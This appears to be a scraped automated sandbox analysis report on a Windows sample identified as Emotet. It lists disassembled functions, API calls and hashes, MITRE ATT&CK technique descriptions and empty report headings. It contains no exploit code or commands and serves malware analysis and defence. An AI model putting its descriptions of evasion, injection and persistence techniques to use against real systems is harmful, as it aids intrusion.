String ID:
API String ID: 1951056069-0
Opcode ID: b39d06836fe5e1206e4c95e4157a14693da382ad63a72a541a37cd5078fd0d35
Instruction ID: 2bed57462cecbe4a128af116478363b701aa4a2863959e3fdbc82827f4e35e65
Opcode Fuzzy Hash: b39d06836fe5e1206e4c95e4157a14693da382ad63a72a541a37cd5078fd0d35
Instruction Fuzzy Hash: 7D51A4B16243029BDB20DFA5D840B5BB7E9EFC4714F40492DF54AF7204E3B4DA0A9BA1

Uniqueness

Uniqueness Score: -1.00%

Function 022E0550, Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMove
String ID:
API String ID: 1951056069-0
Opcode ID: 7ed6cc83deef43c7acbca9d78813a0c0df2d7fe2cb5e53342ce8e64620e6dad7
Instruction ID: 4ceae5d064fd46cc3c951793e4362302e5134ffdc672da50b19d15871d4355b6
Opcode Fuzzy Hash: 7ed6cc83deef43c7acbca9d78813a0c0df2d7fe2cb5e53342ce8e64620e6dad7
Instruction Fuzzy Hash: 984126B26143059BCB20DEA5D840B9FB7D9EFC4710F80492EF585F7240D774E60A8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 022E0B50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 022E0D00: lstrcpynW.KERNEL32(?,00000000,00000000,00000010,022E0B7D,00000000), ref: 022E0D15

RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 022E0B88
RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 022E0BBA
RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 022E0BFB

Strings

PE, xrefs: 022E0BBF

Memory Dump Source

Source File: 00000005.00000002.906160821.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_22e0000_KBDHU1.jbxd

Similarity

API ID: MemoryMove$lstrcpyn
String ID: PE
API String ID: 2715459254-4258593460
Opcode ID: 86c93febc2e2e00710f2e2c5a94d8761f82566f57464499d5d71b1ff67ea6e92
Instruction ID: 0aeb9c1dcbdaf3541a17dc46a9048456f4d7447f8b2dec0824f1ccba14750d82
Opcode Fuzzy Hash: 86c93febc2e2e00710f2e2c5a94d8761f82566f57464499d5d71b1ff67ea6e92
Instruction Fuzzy Hash: EF110B316603046ADE30A6D4CC40FBFA7AADFC1710F408839F645B7184CAB6964DD792

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report boI88C399w.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Function 02CB01F0, Relevance: 21.1, APIs: 14, Instructions: 125
memorynativeCOMMON

Function 02CC38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Function 02CC7EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Function 02CC5070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Function 02CC8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Function 0045FAD0, Relevance: 110.6, APIs: 59, Strings: 4, Instructions: 337
memoryCOMMON

Function 004640D0, Relevance: 36.2, APIs: 24, Instructions: 220
COMMON

Function 00460110, Relevance: 18.2, APIs: 12, Instructions: 186
COMMON

Function 02CB0990, Relevance: 9.1, APIs: 6, Instructions: 97
memoryCOMMON

Function 00463F60, Relevance: 9.1, APIs: 6, Instructions: 57
COMMON

Function 02CC30D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Function 00464040, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 02CC4BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Function 02CC96B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Function 02CC36B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Function 02CC5CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 02CC6FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Function 02CC6F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre